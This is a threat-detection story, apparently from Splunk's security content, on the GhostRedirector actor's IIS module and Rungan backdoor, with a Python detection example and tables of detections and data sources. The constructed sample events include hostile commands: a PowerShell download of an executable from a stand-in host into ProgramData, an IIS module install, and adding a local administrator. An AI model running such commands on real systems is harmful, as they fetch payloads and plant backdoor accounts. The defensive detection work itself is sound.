Analytics Story: GhostRedirector IIS Module and Rungan Backdoor

Description

This story tracks GhostRedirector, a China-aligned threat actor that compromises Windows servers and abuses IIS to deliver SEO fraud alongside a passive C++ backdoor. The actor leverages web application flaws, most notably SQL injection, to execute PowerShell via sqlserver.exe and retrieve tooling from shared staging infrastructure. Persistence and server-side response manipulation are achieved by installing a native IIS module, while command execution and basic backdoor capabilities are provided by the Rungan implant. Tooling, including privilege escalation components, is frequently staged under ProgramData paths and may be obfuscated or code-signed to evade controls.

Why it matters

Following initial access through exploitation of public-facing applications, GhostRedirector issues PowerShell and CertUtil downloads from 868id[.]com to place binaries under C:\ProgramData\Microsoft\DRM\log. A malicious native IIS module (Gamshen) is registered so that w3wp.exe selectively manipulates responses served to search engine crawlers, enabling SEO fraud. In parallel, the group deploys the Rungan backdoor to execute commands received over HTTP. Privilege escalation relies on public "Potato" techniques (for example EfsPotato and BadPotato) to create or modify local administrator accounts as fallback access. Observed tradecraft includes obfuscation with .NET Reactor, AES-based string decryption, and occasional use of code-signed binaries. Together these behaviors present multiple detection opportunities: IIS module installation and loading, webserver-spawned shells, SQL Server xp_cmdshell abuse, privileged account creation, and unusual file staging or download activity in ProgramData.
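The detection opportunities listed above can be exercised against process-creation telemetry. The following Python is an added example written for this page, not Splunk's own detection logic and not the story's content: it runs a handful of rules modelled on the detections in this story (webserver-spawned shell, SQL Server-spawned shell, download into ProgramData, IIS module installation, execution from ProgramData, local administrator added via net) over constructed Sysmon EventID 1 style records. The staging directory C:\ProgramData\Microsoft\DRM\log comes from the story; the file names drm.exe and module.dll, the module name ExampleModule, the account svc_backup and the host staging.invalid are placeholders chosen for the sample, not observed indicators.

```python
"""Toy detections for the GhostRedirector behaviours described above, run over
constructed Sysmon EventID 1 style process-creation records (added example)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record: the fields Sysmon EventID 1 and Security 4688 share."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


WEBSERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe", "php-cgi.exe"}
# xp_cmdshell runs its command line under the SQL Server service process. The real
# binary name is sqlservr.exe; the story text spells it sqlserver.exe, so both are kept.
SQL_PARENTS = {"sqlservr.exe", "sqlserver.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe", "bitsadmin.exe", "powershell.exe", "pwsh.exe"}

PROGRAMDATA_PATH = re.compile(r"(?i)\b[a-z]:\\programdata\\")
URL = re.compile(r"(?i)\bhttps?://\S+")
# appcmd install/add module and the WebAdministration cmdlet both register IIS modules
IIS_MODULE_CMD = re.compile(r"(?i)(appcmd(\.exe)?\s+(install|add)\s+module|new-webglobalmodule)")
NET_ADMIN_ADD = re.compile(r"(?i)\blocalgroup\s+administrators\b.*\s/add\b")


def webserver_spawned_shell(ev: ProcEvent) -> bool:
    return basename(ev.parent_image) in WEBSERVER_PARENTS and basename(ev.image) in SHELLS


def sql_server_spawned_shell(ev: ProcEvent) -> bool:
    return basename(ev.parent_image) in SQL_PARENTS and basename(ev.image) in SHELLS


def download_to_programdata(ev: ProcEvent) -> bool:
    """A LOLBIN or PowerShell fetching a URL and writing the result under ProgramData."""
    return (basename(ev.image) in DOWNLOADERS
            and URL.search(ev.command_line) is not None
            and PROGRAMDATA_PATH.search(ev.command_line) is not None)


def iis_module_install(ev: ProcEvent) -> bool:
    return IIS_MODULE_CMD.search(ev.command_line) is not None


def execution_from_programdata(ev: ProcEvent) -> bool:
    return PROGRAMDATA_PATH.match(ev.image) is not None


def local_admin_via_net(ev: ProcEvent) -> bool:
    return (basename(ev.image) in {"net.exe", "net1.exe"}
            and NET_ADMIN_ADD.search(ev.command_line) is not None)


RULES = {
    "W3WP Spawning Shell": webserver_spawned_shell,
    "SQL Server Spawning Shell": sql_server_spawned_shell,
    "File Download To ProgramData": download_to_programdata,
    "IIS Module Install": iis_module_install,
    "Process Execution From ProgramData": execution_from_programdata,
    "Local Administrator Added Via Net": local_admin_via_net,
}


def triage(events):
    """Return (event index, rule name) pairs for every rule each event trips."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


# Constructed sample events following the intrusion chain in the story; event 0 is benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs -p"),
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c ver"),
    ProcEvent(r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell.exe -NoProfile -Command Get-Date"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri http://staging.invalid/drm.exe'
              r' -OutFile C:\ProgramData\Microsoft\DRM\log\drm.exe"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\appcmd.exe",
              r"appcmd.exe install module /name:ExampleModule /image:C:\ProgramData\Microsoft\DRM\log\module.dll"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\ProgramData\Microsoft\DRM\log\drm.exe", "drm.exe"),
    ProcEvent(r"C:\ProgramData\Microsoft\DRM\log\drm.exe", r"C:\Windows\System32\net.exe",
              "net localgroup administrators svc_backup /add"),
]

if __name__ == "__main__":
    for index, rule_name in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[index]
        print(f"[{rule_name}] event {index}: {basename(ev.parent_image)} -> {ev.command_line}")
```

Each rule keys on the parent/child relationship or on the command line rather than on a hash or domain, which is why the same logic keeps firing when the actor rotates staging hosts or re-signs binaries; the trade-off is that legitimate IIS administration (appcmd, New-WebGlobalModule) will also trip the module rule and needs an allowlist or change-window check in production.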

Detections

| Name | Technique | Type |
|---|---|---|
| W3WP Spawning Shell | Web Shell | TTP |
| BITSAdmin Download File | BITS Jobs, Ingress Tool Transfer | TTP |
| CertUtil With Decode Argument | Deobfuscate/Decode Files or Information | TTP |
| Cisco NVM - Webserver Download From File Sharing Website | Ingress Tool Transfer, Exploit Public-Facing Application | TTP |
| Detect Exchange Web Shell | External Remote Services, Exploit Public-Facing Application, Web Shell | TTP |
| Detect Remote Access Software Usage File | Remote Access Tools | Anomaly |
| Detect Remote Access Software Usage Process | Remote Access Tools | Anomaly |
| Executables Or Script Creation In Suspicious Path | Masquerading | Anomaly |
| Headless Browser Mockbin or Mocky Request | Hidden Window | TTP |
| LOLBAS With Network Traffic | Ingress Tool Transfer, Exfiltration Over Web Service, System Binary Proxy Execution | TTP |
| Malicious PowerShell Process - Encoded Command | Obfuscated Files or Information | Hunting |
| Malicious PowerShell Process With Obfuscation Techniques | PowerShell | TTP |
| PowerShell 4104 Hunting | PowerShell | Hunting |
| Powershell Fileless Script Contains Base64 Encoded Content | Obfuscated Files or Information, PowerShell | TTP |
| Short Lived Windows Accounts | Local Accounts, Local Account | TTP |
| Suspicious Curl Network Connection | Ingress Tool Transfer | TTP |
| Suspicious Process Executed From Container File | Malicious File, Masquerade File Type | TTP |
| Web or Application Server Spawning a Shell | Exploit Public-Facing Application, External Remote Services | TTP |
| Windows Access Token Manipulation SeDebugPrivilege | Create Process with Token | Anomaly |
| Windows Create Local Account | Local Account | Anomaly |
| Windows Create Local Administrator Account Via Net | Local Account | Anomaly |
| Windows Curl Download to Suspicious Path | Ingress Tool Transfer | TTP |
| Windows File Download Via PowerShell | PowerShell, Ingress Tool Transfer | Anomaly |
| Windows HTTP Network Communication From MSIExec | Msiexec | Anomaly |
| Windows IIS Components Add New Module | IIS Components | Anomaly |
| Windows IIS Components Get-WebGlobalModule Module Query | IIS Components | Hunting |
| Windows IIS Components New Module Added | IIS Components | TTP |
| Windows Modify Registry Disable Restricted Admin | Modify Registry | TTP |
| Windows Obfuscated Files or Information via RAR SFX | Encrypted/Encoded File | Anomaly |
| Windows PowerShell IIS Components WebGlobalModule Usage | IIS Components | Anomaly |
| Windows PowerShell Invoke-Sqlcmd Execution | PowerShell, Windows Command Shell | Hunting |
| Windows Privilege Escalation Suspicious Process Elevation | Exploitation for Privilege Escalation, Abuse Elevation Control Mechanism, Access Token Manipulation | TTP |
| Windows Privilege Escalation User Process Spawn System Process | Exploitation for Privilege Escalation, Abuse Elevation Control Mechanism, Access Token Manipulation | TTP |
| Windows Process Execution From ProgramData | Match Legitimate Resource Name or Location | Anomaly |
| Windows SQL Server xp_cmdshell Config Change | SQL Stored Procedures | TTP |
| Windows SQLCMD Execution | Windows Command Shell | Hunting |
| Windows Suspicious Child Process Spawned From WebServer | Web Shell | TTP |
| Windows Suspicious Process File Path | Create or Modify System Process, Match Legitimate Resource Name or Location | TTP |
| Ivanti EPM SQL Injection Remote Code Execution | Exploit Public-Facing Application | TTP |
| SQL Injection with Long URLs | Exploit Public-Facing Application | TTP |
| Supernova Webshell | Web Shell, External Remote Services | TTP |
| Web Remote ShellServlet Access | Exploit Public-Facing Application | TTP |

Data Sources

| Name | Platform | Sourcetype | Source |
|---|---|---|---|
| Cisco Network Visibility Module Flow Data | Network | cisco:nvm:flowdata | not_applicable |
| CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike |
| Nginx Access | N/A | nginx:plus:kv | /var/log/nginx/access.log |
| Powershell Installed IIS Modules | Windows | Pwsh:InstalledIISModules | powershell://AppCmdModules |
| Powershell Script Block Logging 4104 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational |
| Suricata | N/A | suricata | suricata |
| Sysmon EventID 1 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Sysmon EventID 11 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Sysmon EventID 13 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Sysmon EventID 3 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Sysmon for Linux EventID 1 | Linux | sysmon:linux | Syslog:Linux-Sysmon/Operational |
| Windows Event Log Application 15457 | Windows | XmlWinEventLog | XmlWinEventLog:Application |
| Windows Event Log Security 4688 | Windows | XmlWinEventLog | XmlWinEventLog:Security |
| Windows Event Log Security 4703 | Windows | XmlWinEventLog | XmlWinEventLog:Security |
| Windows Event Log Security 4720 | Windows | XmlWinEventLog | XmlWinEventLog:Security |
| Windows Event Log System 4720 | Windows | XmlWinEventLog | XmlWinEventLog:System |
| Windows Event Log System 4726 | Windows | XmlWinEventLog | XmlWinEventLog:System |
| Windows IIS 29 | Windows | IIS:Configuration:Operational | IIS:Configuration:Operational |

Source: GitHub | Version: 1